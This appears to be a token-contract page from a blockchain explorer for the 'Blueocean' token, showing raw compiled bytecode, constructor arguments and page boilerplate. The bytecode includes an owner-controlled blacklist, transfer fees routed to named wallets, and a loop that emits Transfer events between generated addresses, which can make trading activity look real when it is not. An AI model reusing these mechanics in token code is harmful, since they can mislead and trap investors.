15611558573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906114969190612e50565b6000610e2b8284612e6d565b6000610e2b8284612ea2565b6000610e2b8284612d97565b6001600160a01b0383166116025760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b6064820152608401610c0e565b6001600160a01b0382166116635760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b6064820152608401610c0e565b6001600160a01b0383811660008181526001602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a3505050565b6001600160a01b03821660009081526015602052604090205460ff16151581151514610c56576001600160a01b038216600081815260156020908152604091829020805460ff191685151590811790915591519182527ffed07c88bd5d31bfd0ce77ed7ffdc74a163a61cfc5edcec801e3a7954e33d6e79101611177565b6001600160a01b038381166000908152600160209081526040808320938616835292905220546000198114610d3f57818110156117c15760405162461bcd60e51b815260206004820152601d60248201527f45524332303a20696e73756666696369656e7420616c6c6f77616e63650000006044820152606401610c0e565b610d3f84848484036115a0565b6001600160a01b0383166117f45760405162461bcd60e51b8152600401610c0e90612eb6565b6001600160a01b03821661181a5760405162461bcd60e51b8152600401610c0e90612efb565b8060000361182e5761149683836000611e78565b6001600160a01b03831660009081526015602052604090205460ff1615801561187057506001600160a01b03821660009081526015602052604090205460ff16155b6118ab5760405162461bcd60e51b815260206004820152600c60248201526b125cc8189b1858dadb1a5cdd60a21b6044820152606401610c0e565b6118b58383611fcc565b156118c2576118c261206b565b6118cc8383612304565b15611949577f0000000000000000000000007bc4e35ea2f49328e08a36d7f2fd1dabc9ce6fdb6001600160a01b0316836001600160a01b03161461193b57600061192b6064611925606361191f88610df4565b9061157c565b90611588565b905080821115611939578091505b505b61194683838361236d565b90505b611954838383611e78565b60006011541180156119705750600554600160a01b900460ff16155b1561198057611980601154611d88565b6012546001600160a01b03166119ac57601280546001600160a01b0319166001600160a01b0385161790555b6013546001600160a01b03166119d857601380546001600160a01b0319166001600160a01b0384161790555b6012546001600160a01b031660009081526016602052604090205460ff16158015611a3257506012547f0000000000000000000000007bc4e35ea2f49328e08a36d7f2fd1dabc9ce6fdb6001600160a01b03908116911614155b15611ab257601254604051637de7a18d60e01b81526001600160a01b0391821660048201527f0000000000000000000000004ffab08c5d2493862b1988af0d0d7d30dc2e24d190911690637de7a18d90602401600060405180830381600087803b158015611a9f57600080fd5b505af1925050508015611ab0575060015b505b6013546001600160a01b031660009081526016602052604090205460ff16158015611b0c57506013547f0000000000000000000000007bc4e35ea2f49328e08a36d7f2fd1dabc9ce6fdb6001600160a01b03908116911614155b15611b8c57601354604051637de7a18d60e01b81526001600160a01b0391821660048201527f0000000000000000000000004ffab08c5d2493862b1988af0d0d7d30dc2e24d190911690637de7a18d90602401600060405180830381600087803b158015611b7957600080fd5b505af1925050508015611b8a575060015b505b601280546001600160a01b038086166001600160a01b031992831617909255601380549285169290911691909117905560055460ff600160a01b90910416158015611be557506005546001600160a01b03848116911614155b8015611bff57506005546001600160a01b03838116911614155b8015611c1457506001600160a01b0383163014155b8015611cad575042611caa6017547f0000000000000000000000004ffab08c5d2493862b1988af0d0d7d30dc2e24d16001600160a01b031663b181b28a6040518163ffffffff1660e01b8152600401602060405180830381865afa158015611c80573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190611ca49190612e37565b90611594565b11155b15611496576018546040516001624d3b8760e01b0319815260048101919091527f0000000000000000000000004ffab08c5d2493862b1988af0d0d7d30dc2e24d16001600160a01b03169063ffb2c47990602401600060405180830381600087803b158015611d1b57600080fd5b505af1925050508015611d2c575060015b1561149657505050565b600580546001600160a01b038381166001600160a01b0319831681179093556040519116919082907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e090600090a35050565b60008060005b83811015610d3f57600f54611dae906001600160a01b0316600019612f3e565b600f54909350611dc8906001600160a01b03166001612f64565b600f80546001600160a01b0319166001600160a01b03929092169182179055611df390600019612f3e565b600f54909250611e0d906001600160a01b03166001612f64565b600f80546001600160a01b0319166001600160a01b03928316179055601054604051908152848216918416907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef9060200160405180910390a380611e7081612dc5565b915050611d8e565b6001600160a01b038316611e9e5760405162461bcd60e51b8152600401610c0e90612eb6565b6001600160a01b038216611ec45760405162461bcd60e51b8152600401610c0e90612efb565b6001600160a01b03831660009081526020819052604090205481811015611f3c5760405162461bcd60e51b815260206004820152602660248201527f45524332303a207472616e7366657220616d6f756e7420657863656564732062604482015265616c616e636560d01b6064820152608401610c0e565b6001600160a01b03808516600090815260208190526040808220858503905591851681529081208054849290611f73908490612d97565b92505081905550826001600160a01b0316846001600160a01b03167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef84604051611fbf91815260200190565b60405180910390a3610d3f565b600554600090600160a01b900460ff1615801561201b57507f0000000000000000000000007bc4e35ea2f49328e08a36d7f2fd1dabc9ce6fdb6001600160a01b0316836001600160a01b031614155b801561203557506005546001600160a01b03848116911614155b801561204f57506005546001600160a01b03838116911614155b8015610e2b575060065461206230610df4565b10159392505050565b6005805460ff60a01b1916600160a01b1790556009541561209857612091600954612572565b5060006009555b60075415612171577f00000000000000000000000055d398326f99059ff775485246999027b31979556001600160a01b031663a9059cbb7f0000000000000000000000004ffab08c5d2493862b1988af0d0d7d30dc2e24d16120fb6007546125f3565b6040516001600160e01b031960e085901b1681526001600160a01b03909216600483015260248201526044016020604051808303816000875af1158015612146573d6000803e3d6000fd5b505050506040513d601f19601f8201168201806040525081019061216a9190612e50565b5060006007555b6008541561223357600b546008546001600160a01b037f00000000000000000000000055d398326f99059ff775485246999027b319795581169263a9059cbb929116906121bd906125f3565b6040516001600160e01b031960e085901b1681526001600160a01b03909216600483015260248201526044016020604051808303816000875af1158015612208573d6000803e3d6000fd5b505050506040513d601f19601f8201168201806040525081019061222c9190612e50565b5060006008555b600a54156122f557600c54600a546001600160a01b037f00000000000000000000000055d398326f99059ff775485246999027b319795581169263a9059cbb9291169061227f906125f3565b6040516001600160e01b031960e085901b1681526001600160a01b03909216600483015260248201526044016020604051808303816000875af11580156122ca573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906122ee9190612e50565b506000600a555b6005805460ff60a01b19169055565b6001600160a01b03821660009081526014602052604081205460ff168061234357506001600160a01b03821660009081526014602052604090205460ff165b806123575750600554600160a01b900460ff165b1561236457506000610bde565b50600192915050565b8060006123a06103e8611925847f000000000000000000000000000000000000000000000000000000000000000a61157c565b90506123cd857f000000000000000000000000000000000000000000000000000000000000dead83611e78565b6123d7828261290e565b9150600061240b6103e8611925867f000000000000000000000000000000000000000000000000000000000000000561157c565b9050806009600082825461241f9190612d97565b9091555061242f9050838261290e565b925060006124636103e8611925877f000000000000000000000000000000000000000000000000000000000000001461157c565b905080600760008282546124779190612d97565b909155506124879050848261290e565b935060006124bb6103e8611925887f000000000000000000000000000000000000000000000000000000000000001461157c565b905080600860008282546124cf9190612d97565b909155506124df9050858261290e565b945060006125266103e861192561251f6124f88c610b57565b7f000000000000000000000000000000000000000000000000000000000000000590611594565b8a9061157c565b905080600a600082825461253a9190612d97565b9091555061254a9050868261290e565b9550612566893061256187611ca486818a8a611594565b611e78565b50505050509392505050565b600080612580836002611588565b9050600061258e848361290e565b9050600061259b836125f3565b90506125a7828261291a565b60408051858152602081018490529081018490529094507f17bbfb9a6069321b6ded73bd96327c9e6b7212a5cd51ff219cd61370acafb5619060600160405180910390a1505050919050565b60408051600280825260608201835260009283929190602083019080368337019050509050308160008151811061262c5761262c612daf565b60200260200101906001600160a01b031690816001600160a01b0316815250507f00000000000000000000000055d398326f99059ff775485246999027b31979558160018151811061268057612680612daf565b60200260200101906001600160a01b031690816001600160a01b0316815250506126cb307f00000000000000000000000010ed43c718714eb63d5aa57b78b54704e256024e856115a0565b604051635c11d79560e01b81526001600160a01b037f00000000000000000000000010ed43c718714eb63d5aa57b78b54704e256024e1690635c11d7959061274090869060009086907f000000000000000000000000a1e6d4c66fe8207f5dd605f641a589f803311e78904290600401612f8f565b600060405180830381600087803b15801561275a57600080fd5b505af115801561276e573d6000803e3d6000fd5b50506040516370a0823160e01b8152306004820152600092507f00000000000000000000000055d398326f99059ff775485246999027b31979556001600160a01b031691506370a0823190602401602060405180830381865afa1580156127d9573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906127fd9190612e37565b90507f000000000000000000000000a1e6d4c66fe8207f5dd605f641a589f803311e786001600160a01b0316633ccfd60b6040518163ffffffff1660e01b8152600401600060405180830381600087803b15801561285a57600080fd5b505af115801561286e573d6000803e3d6000fd5b50506040516370a0823160e01b815230600482015261290692508391506001600160a01b037f00000000000000000000000055d398326f99059ff775485246999027b319795516906370a0823190602401602060405180830381865afa1580156128dc573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906129009190612e37565b9061290e565b949350505050565b6000610e2b8284613000565b60405163095ea7b360e01b81526001600160a01b037f00000000000000000000000010ed43c718714eb63d5aa57b78b54704e256024e81166004830152602482018390526000917f00000000000000000000000055d398326f99059ff775485246999027b31979559091169063095ea7b3906044016020604051808303816000875af11580156129ae573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906129d29190612e50565b506129fe307f00000000000000000000000010ed43c718714eb63d5aa57b78b54704e256024e856115a0565b600d5460405162e8e33760e81b81523060048201526001600160a01b037f00000000000000000000000055d398326f99059ff775485246999027b319795581166024830152604482018690526064820185905260006084830181905260a483015291821660c48201524260e48201527f00000000000000000000000010ed43c718714eb63d5aa57b78b54704e256024e9091169063e8e3370090610104016060604051808303816000875af1158015612abb573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190612adf9190613017565b95945050505050565b600060208083528351808285015260005b81811015612b1557858101830151858201604001528201612af9565b81811115612b27576000604083870101525b50601f01601f1916929092016040019392505050565b6001600160a01b0381168114610e9b57600080fd5b600060208284031215612b6457600080fd5b8135610e2b81612b3d565b60008060408385031215612b8257600080fd5b8235612b8d81612b3d565b946020939093013593505050565b60008060408385031215612bae57600080fd5b50508035926020909101359150565b8015158114610e9b57600080fd5b60008060408385031215612bde57600080fd5b8235612be981612b3d565b91506020830135612bf981612bbd565b809150509250929050565b600080600060608486031215612c1957600080fd5b8335612c2481612b3d565b92506020840135612c3481612b3d565b929592945050506040919091013590565b600060208284031215612c5757600080fd5b5035919050565b600080600060408486031215612c7357600080fd5b833567ffffffffffffffff80821115612c8b57600080fd5b818601915086601f830112612c9f57600080fd5b813581811115612cae57600080fd5b8760208260051b8501011115612cc357600080fd5b60209283019550935050840135612cd981612bbd565b809150509250925092565b60008060408385031215612cf757600080fd5b8235612d0281612b3d565b91506020830135612bf981612b3d565b600181811c90821680612d2657607f821691505b602082108103612d4657634e487b7160e01b600052602260045260246000fd5b50919050565b6020808252818101527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572604082015260600190565b634e487b7160e01b600052601160045260246000fd5b60008219821115612daa57612daa612d81565b500190565b634e487b7160e01b600052603260045260246000fd5b600060018201612dd757612dd7612d81565b5060010190565b6040808252810183905260008460608301825b86811015612e21578235612e0481612b3d565b6001600160a01b0316825260209283019290910190600101612df1565b5080925050508215156020830152949350505050565b600060208284031215612e4957600080fd5b5051919050565b600060208284031215612e6257600080fd5b8151610e2b81612bbd565b6000816000190483118215151615612e8757612e87612d81565b500290565b634e487b7160e01b600052601260045260246000fd5b600082612eb157612eb1612e8c565b500490565b60208082526025908201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604082015264647265737360d81b606082015260800190565b60208082526023908201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260408201526265737360e81b606082015260800190565b60006001600160a01b0383811680612f5857612f58612e8c565b92169190910492915050565b60006001600160a01b03828116848216808303821115612f8657612f86612d81565b01949350505050565b600060a082018783526020878185015260a0604085015281875180845260c086019150828901935060005b81811015612fdf5784516001600160a01b031683529383019391830191600101612fba565b50506001600160a01b03969096166060850152505050608001529392505050565b60008282101561301257613012612d81565b500390565b60008060006060848603121561302c57600080fd5b835192506020840151915060408401519050925092509256fea2646970667358221220dc919364dc39f5f860e02211b5d9ea001bf135cf21a5e13c073954a914c355ab64736f6c634300080d0033
Constructor Arguments (ABI-Encoded and is the last bytes of the Contract Creation Code above)
0000000000000000000000000000000000000000000000000000000000000100000000000000000000000000000000000000000000000000000000000000014000000000000000000000000000000000000000000000000000038d7ea4c6800000000000000000000000000055d398326f99059ff775485246999027b319795500000000000000000000000010ed43c718714eb63d5aa57b78b54704e256024e00000000000000000000000084dfd0caba1d2ec401bdca8d01c6fc49e1e4e4a5000000000000000000000000ea6c47ddf0415b5df6ea4011d92e4a8496bc4c54000000000000000000000000000000000000000000000000000000000000dead0000000000000000000000000000000000000000000000000000000000000009426c75656f6365616e00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000009426c75656f6365616e0000000000000000000000000000000000000000000000
-----Decoded View---------------
Arg [0] : name_ (string): Blueocean
Arg [1] : symbol_ (string): Blueocean
Arg [2] : totalSupply_ (uint256): 1000000000000000
Arg [3] : usdt_ (address): 0x55d398326f99059fF775485246999027B3197955
Arg [4] : uniswapV2Router_ (address): 0x10ED43C718714eb63d5aA57B78B54704E256024E
Arg [5] : marketingWallet_ (address): 0x84DFd0caBa1d2eC401BdCA8D01c6fC49E1e4E4a5
Arg [6] : buybackWallet_ (address): 0xea6C47DDF0415b5DF6ea4011D92E4A8496bc4c54
Arg [7] : lpReceiveWallet_ (address): 0x000000000000000000000000000000000000dEaD
-----Encoded View---------------
12 Constructor Arguments found :
Arg [0] : 0000000000000000000000000000000000000000000000000000000000000100
Arg [1] : 0000000000000000000000000000000000000000000000000000000000000140
Arg [2] : 00000000000000000000000000000000000000000000000000038d7ea4c68000
Arg [3] : 00000000000000000000000055d398326f99059ff775485246999027b3197955
Arg [4] : 00000000000000000000000010ed43c718714eb63d5aa57b78b54704e256024e
Arg [5] : 00000000000000000000000084dfd0caba1d2ec401bdca8d01c6fc49e1e4e4a5
Arg [6] : 000000000000000000000000ea6c47ddf0415b5df6ea4011d92e4a8496bc4c54
Arg [7] : 000000000000000000000000000000000000000000000000000000000000dead
Arg [8] : 0000000000000000000000000000000000000000000000000000000000000009
Arg [9] : 426c75656f6365616e0000000000000000000000000000000000000000000000
Arg [10] : 0000000000000000000000000000000000000000000000000000000000000009
Arg [11] : 426c75656f6365616e0000000000000000000000000000000000000000000000
Loading...
Loading
Loading...
Loading
[ Download: CSV Export ]
[ Download: CSV Export ]
A token is a representation of an on-chain or off-chain asset. The token page shows information such as price, total supply, holders, transfers and social links. Learn more about this page in our Knowledge Base.
Add Token to MetaMask (Web3)